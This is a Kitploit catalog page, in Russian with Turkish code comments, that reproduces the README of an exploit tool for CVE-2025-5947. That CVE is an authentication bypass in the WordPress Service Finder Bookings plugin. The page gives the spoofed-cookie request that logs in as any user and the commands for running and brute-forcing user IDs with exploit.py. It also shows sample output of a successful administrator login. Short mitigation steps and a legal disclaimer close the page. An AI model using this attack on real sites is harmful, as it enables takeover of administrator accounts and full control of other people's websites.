Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-5947 — CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Эксплойт | Kitploit
Инструменты/GitHubGitHub/xxconi/cve-2025-5947
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubxxconi/cve-2025-5947

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Эксплойт

Репозиторий
2 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-5947

Эксплойт CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0

CVE-2025-5947 Exploit - Service Finder Bookings

License Python Status CVSS

Инструмент эксплуатации уязвимости обхода аутентификации в плагине WordPress Service Finder Bookings ≤ 6.0

📋 Содержание

  • Об уязвимости
  • Технические детали
  • Установка
  • Использование
  • Примеры
  • Результаты
  • Безопасность
  • Ресурсы

🔴 Об уязвимости

CVE-2025-5947

В плагине Service Finder Bookings для WordPress версии 6.0 и ранее обнаружена критическая уязвимость обхода аутентификации.

🎯 Воздействие

Неаутентифицированные злоумышленники могут:

  • ✅ Войти под видом любого пользователя
  • ✅ Получить доступ к учётным записям администраторов
  • ✅ Получить полный контроль над системой
  • ✅ Вызвать утечку данных
  • ✅ Загрузить вредоносный код

🔍 Технические детали

Причина уязвимости

В функции service_finder_switch_back() наблюдается недостаточная проверка cookie:

root@kitploit:~
// Güvenli olmayan kod
if(isset($_COOKIE['original_user_id'])) {
    $user_id = $_COOKIE['original_user_id'];
    wp_set_current_user($user_id);
    // Doğrulama yok!
}

Вектор атаки

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1

Характеристики атаки:

  • 🌐 Удалённый доступ (AV:N)
  • 🔓 Без аутентификации (PR:N)
  • 👤 Без взаимодействия с пользователем (UI:N)
  • 📊 Полное воздействие (C:H, I:H, A:H)

📦 Установка

Требования

  • Python 3.6+
  • библиотека requests

Шаг 1: Клонируйте репозиторий

root@kitploit:~
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947

Шаг 2: Установите зависимости

root@kitploit:~
pip install -r requirements.txt

Шаг 3: Запустите

root@kitploit:~
python exploit.py -u http://target.com

🚀 Использование

Основные команды

root@kitploit:~
# Yardım göster
python exploit.py -h

# Admin (ID=1) olarak giriş dene
python exploit.py -u http://target.com

# Belirli kullanıcı ID'si ile
python exploit.py -u http://target.com -i 5

# Brute force (ID 1-10)
python exploit.py -u http://target.com -b 1-10

# SSL doğrulaması olmadan
python exploit.py -u http://target.com --no-ssl-verify

# Özel timeout ile
python exploit.py -u http://target.com -t 30

Параметры

💡 Примеры

Пример 1: Простой эксплойт

root@kitploit:~
python exploit.py -u http://wordpress.local

Вывод:

root@kitploit:~
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Service Finder Bookings eklentisi bulundu

🔍 Kullanıcı ID 1 ile giriş denemesi yapılıyor...
📊 HTTP Status: 302
📋 Response Headers:
   Location: http://wordpress.local/wp-admin/
   Set-Cookie: wordpress_logged_in_abc123=...

✅ BAŞARILI! Admin olarak giriş yapıldı!
📍 Yönlendirme: http://wordpress.local/wp-admin/

Пример 2: Перебор (Brute Force)

root@kitploit:~
python exploit.py -u http://target.com -b 1-20

Вывод:

root@kitploit:~
🔄 Brute Force Başlıyor (20 kullanıcı)...
✅ Kullanıcı ID 1: BAŞARILI
❌ Kullanıcı ID 2: Başarısız
✅ Kullanıcı ID 3: BAŞARILI
...
✅ Başarılı Kullanıcılar: [1, 3, 5]

Пример 3: HTTPS без проверки SSL

root@kitploit:~
python exploit.py -u https://target.com --no-ssl-verify

📊 Результаты

Успешный эксплойт характеризуется следующими признаками:

✅ Код ответа HTTP 301 или 302
✅ Наличие /wp-admin/ в заголовке Location
✅ Наличие wordpress_logged_in_ в заголовке Set-Cookie

🛡️ Безопасность

⚠️ Правовое предупреждение

Этот инструмент предназначен исключительно для:

  • ✅ Авторизованного тестирования безопасности
  • ✅ Использования на ваших собственных системах
  • ✅ Использования при наличии письменного разрешения

Используйте только в этих целях. Автор не несёт ответственности.

🔐 Способы защиты

  1. Срочное обновление

    root@kitploit:~
    # WordPress admin panelinden güncelle
    # veya WP-CLI ile
    wp plugin update sf-booking
    
  2. Отключение плагина

    root@kitploit:~
    wp plugin deactivate sf-booking
    
  3. Удаление плагина

    root@kitploit:~
    wp plugin delete sf-booking
    
  4. Web Application Firewall (WAF)

    root@kitploit:~
    Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
    
  5. Проверка безопасности

    • Проверьте учётные записи администраторов
    • Изучите журналы доступа
    • Проверьте, не было ли несанкционированного доступа

📚 Ресурсы

  • База данных Patchstack
  • GitHub Advisory
  • Детали NVD
  • Оригинальный эксплойт
  • Калькулятор CVSS

🤝 Внесение вклада

Чтобы сообщить об ошибках или предложить улучшения:

  1. Сделайте форк
  2. Создайте отдельную ветку (git checkout -b feature/improvement)
  3. Сделайте коммит (git commit -am 'Add improvement')
  4. Запушьте изменения (git push origin feature/improvement)
  5. Откройте Pull Request

📄 Лицензия

Лицензия MIT — подробности см. в файле LICENSE

👤 Автор

Исследователь безопасности

  • GitHub: @yourusername

🙏 Благодарности

  • Patchstack Security Team
  • WordPress Security Community
  • CVE Coordinators

⭐ Если вам пригодилось, поставьте звезду!

🔝 Наверх

Скачать инструмент
ХарактеристикаЗначение
CVE IDCVE-2025-5947
ПлагинService Finder Bookings (sf-booking)
Затронутая версия≤ 6.0
Критичность🔴 КРИТИЧЕСКАЯ
Оценка CVSS9.8
CWECWE-639 (Обход авторизации)
Оценка EPSS0.617 (98.357 перцентиль)
Дата публикации2025
ПараметрСокращениеОписаниеПо умолчанию
--url-uЦелевой URL (обязательно)-
--user-id-iID пользователя1
--brute-force-bДиапазон перебора (1-10)-
--no-ssl-verify-Отключить проверку SSLFalse
--timeout-tТаймаут запроса (секунды)10